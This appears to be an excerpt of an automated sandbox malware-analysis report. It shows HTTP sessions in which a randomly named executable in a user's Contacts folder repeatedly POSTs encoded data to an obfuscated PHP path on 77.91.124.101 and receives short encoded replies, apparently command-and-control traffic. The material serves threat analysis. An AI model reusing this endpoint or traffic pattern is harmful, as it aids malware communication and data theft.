Nov 21, 2023 04:47:31.758867979 CET	175	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:31.958381891 CET	175	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:31.958623886 CET	177	OUT	Data Raw: 52 5f 58 59 5b 5c 5a 5d 5d 57 55 57 55 5f 57 55 50 53 58 49 56 53 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_XY[\Z]]WUWU_WUPSXIVSW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=!X?9=#+.47&('=$ -,;-?<X;>&G''^)#
Nov 21, 2023 04:47:32.168170929 CET	178	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	192.168.2.5	49795	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:20.236531973 CET	486	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:20.434251070 CET	486	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:20.434470892 CET	488	OUT	Data Raw: 52 5b 58 50 5e 58 5f 5a 5d 57 55 57 55 58 57 55 50 52 58 48 56 5e 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[XP^X_Z]WUWUXWUPRXHV^W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')1_?(:? '[8*^"9!]?Q'-!&#!-"]>,8>&G''^)?
Nov 21, 2023 04:48:20.636868000 CET	489	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	77.91.124.101	80	192.168.2.5	49795	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:20.236531973 CET	486	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:20.434251070 CET	486	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:20.434470892 CET	488	OUT	Data Raw: 52 5b 58 50 5e 58 5f 5a 5d 57 55 57 55 58 57 55 50 52 58 48 56 5e 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[XP^X_Z]WUWUXWUPRXHV^W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')1_?(:? '[8*^"9!]?Q'-!&#!-"]>,8>&G''^)?
Nov 21, 2023 04:48:20.636868000 CET	489	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
81	192.168.2.5	49796	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:20.957691908 CET	490	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:21.155589104 CET	490	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:21.155800104 CET	492	OUT	Data Raw: 57 51 5d 5c 5b 5e 5a 5f 5d 57 55 57 55 5b 57 52 50 5b 58 41 56 5f 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WQ]\[^Z_]WUWU[WRP[XAV_WR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X);=+>/B&4+30[%0,+<<<,&G''^)3
Nov 21, 2023 04:48:21.366157055 CET	493	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
81	77.91.124.101	80	192.168.2.5	49796	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:20.957691908 CET	490	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:21.155589104 CET	490	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:21.155800104 CET	492	OUT	Data Raw: 57 51 5d 5c 5b 5e 5a 5f 5d 57 55 57 55 5b 57 52 50 5b 58 41 56 5f 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WQ]\[^Z_]WUWU[WRP[XAV_WR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X);=+>/B&4+30[%0,+<<<,&G''^)3
Nov 21, 2023 04:48:21.366157055 CET	493	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
82	77.91.124.101	80	192.168.2.5	49797	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:21.689570904 CET	493	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:21.886193037 CET	494	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:21.886437893 CET	496	OUT	Data Raw: 57 5b 5d 5c 5b 5f 5a 50 5d 57 55 57 55 5f 57 51 50 59 58 43 56 57 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W[]\[_ZP]WUWU_WQPYXCVWWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)*(R?#(8.\ )!]<0!$!3 )-5<,$,&G''^)#
Nov 21, 2023 04:48:22.088074923 CET	497	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
82	192.168.2.5	49797	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:21.689570904 CET	493	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:21.886193037 CET	494	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:21.886437893 CET	496	OUT	Data Raw: 57 5b 5d 5c 5b 5f 5a 50 5d 57 55 57 55 5f 57 51 50 59 58 43 56 57 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W[]\[_ZP]WUWU_WQPYXCVWWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)*(R?#(8.\ )!]<0!$!3 )-5<,$,&G''^)#
Nov 21, 2023 04:48:22.088074923 CET	497	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
83	192.168.2.5	49798	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:22.411200047 CET	498	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:22.609960079 CET	498	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:22.791090012 CET	499	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
83	77.91.124.101	80	192.168.2.5	49798	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:22.411200047 CET	498	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:22.609960079 CET	498	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:22.791090012 CET	499	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
84	77.91.124.101	80	192.168.2.5	49799	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:22.787108898 CET	498	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1380 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:22.984966040 CET	500	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:22.988972902 CET	501	OUT	Data Raw: 52 5d 5d 5e 5b 59 5a 5d 5d 57 55 57 55 5e 57 53 50 52 58 40 56 57 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]]^[YZ]]WUWU^WSPRX@VWWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)%<>#;].$\4\&) 6V3=-$>:6\+$;&G''^)
Nov 21, 2023 04:48:23.191557884 CET	504	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:22 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 22 12 32 3c 2f 04 37 33 0d 57 3f 04 07 50 2c 3e 3d 19 2a 23 2e 03 27 3d 3c 59 33 07 25 19 2b 11 0e 1f 25 3a 28 13 21 35 33 03 2a 1a 21 5a 0c 1d 25 06 36 16 2f 52 2b 10 2b 05 3c 2d 2f 06 27 31 09 14 2b 2d 23 55 34 33 33 5b 25 23 19 0e 2c 11 3e 03 3a 3b 2e 08 25 3f 22 58 20 2d 23 5f 0c 14 27 53 36 31 2b 59 20 56 2d 0e 36 09 3c 5f 20 24 37 56 26 2d 27 09 26 06 0f 17 3c 01 3b 0c 26 34 23 0d 27 2a 3c 0e 25 5f 2f 51 3c 2a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: "2</73W?P,>=#.'=<Y3%+%:(!53!Z%6/R++<-/'1+-#U433[%#,>:;.%?"X -#_'S61+Y V-6<_ $7V&-'&<;&4#'<%_/Q<&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
84	192.168.2.5	49799	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:22.787108898 CET	498	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1380 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:22.984966040 CET	500	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:22.988972902 CET	501	OUT	Data Raw: 52 5d 5d 5e 5b 59 5a 5d 5d 57 55 57 55 5e 57 53 50 52 58 40 56 57 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]]^[YZ]]WUWU^WSPRX@VWWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)%<>#;].$\4\&) 6V3=-$>:6\+$;&G''^)
Nov 21, 2023 04:48:23.191557884 CET	504	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:22 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 22 12 32 3c 2f 04 37 33 0d 57 3f 04 07 50 2c 3e 3d 19 2a 23 2e 03 27 3d 3c 59 33 07 25 19 2b 11 0e 1f 25 3a 28 13 21 35 33 03 2a 1a 21 5a 0c 1d 25 06 36 16 2f 52 2b 10 2b 05 3c 2d 2f 06 27 31 09 14 2b 2d 23 55 34 33 33 5b 25 23 19 0e 2c 11 3e 03 3a 3b 2e 08 25 3f 22 58 20 2d 23 5f 0c 14 27 53 36 31 2b 59 20 56 2d 0e 36 09 3c 5f 20 24 37 56 26 2d 27 09 26 06 0f 17 3c 01 3b 0c 26 34 23 0d 27 2a 3c 0e 25 5f 2f 51 3c 2a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: "2</73W?P,>=#.'=<Y3%+%:(!53!Z%6/R++<-/'1+-#U433[%#,>:;.%?"X -#_'S61+Y V-6<_ $7V&-'&<;&4#'<%_/Q<&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
85	192.168.2.5	49800	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:22.909718037 CET	500	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:23.108768940 CET	501	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:23.108985901 CET	504	OUT	Data Raw: 52 5b 5d 59 5b 5e 5a 50 5d 57 55 57 55 5a 57 5b 50 5b 58 40 56 56 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[]Y[^ZP]WUWUZW[P[X@VVW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\']=-X((==,:] >(:3!'3!.86<']8.&G''^)7
Nov 21, 2023 04:48:23.312886953 CET	505	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
85	77.91.124.101	80	192.168.2.5	49800	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:22.909718037 CET	500	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:23.108768940 CET	501	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:23.108985901 CET	504	OUT	Data Raw: 52 5b 5d 59 5b 5e 5a 50 5d 57 55 57 55 5a 57 5b 50 5b 58 40 56 56 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[]Y[^ZP]WUWUZW[P[X@VVW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\']=-X((==,:] >(:3!'3!.86<']8.&G''^)7
Nov 21, 2023 04:48:23.312886953 CET	505	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	192.168.2.5	49801	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:23.625998974 CET	505	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:23.822474003 CET	506	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:23.822760105 CET	508	OUT	Data Raw: 57 58 58 50 5b 53 5a 50 5d 57 55 57 55 5b 57 57 50 5d 58 40 56 50 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WXXP[SZP]WUWU[WWP]X@VPWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)(1(1* 8;'9":*+ "W'=2W$#-9++<_;&G''^)3
Nov 21, 2023 04:48:24.026417971 CET	509	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	77.91.124.101	80	192.168.2.5	49801	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:23.625998974 CET	505	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:23.822474003 CET	506	IN	HTTP/1.1 100 Continue
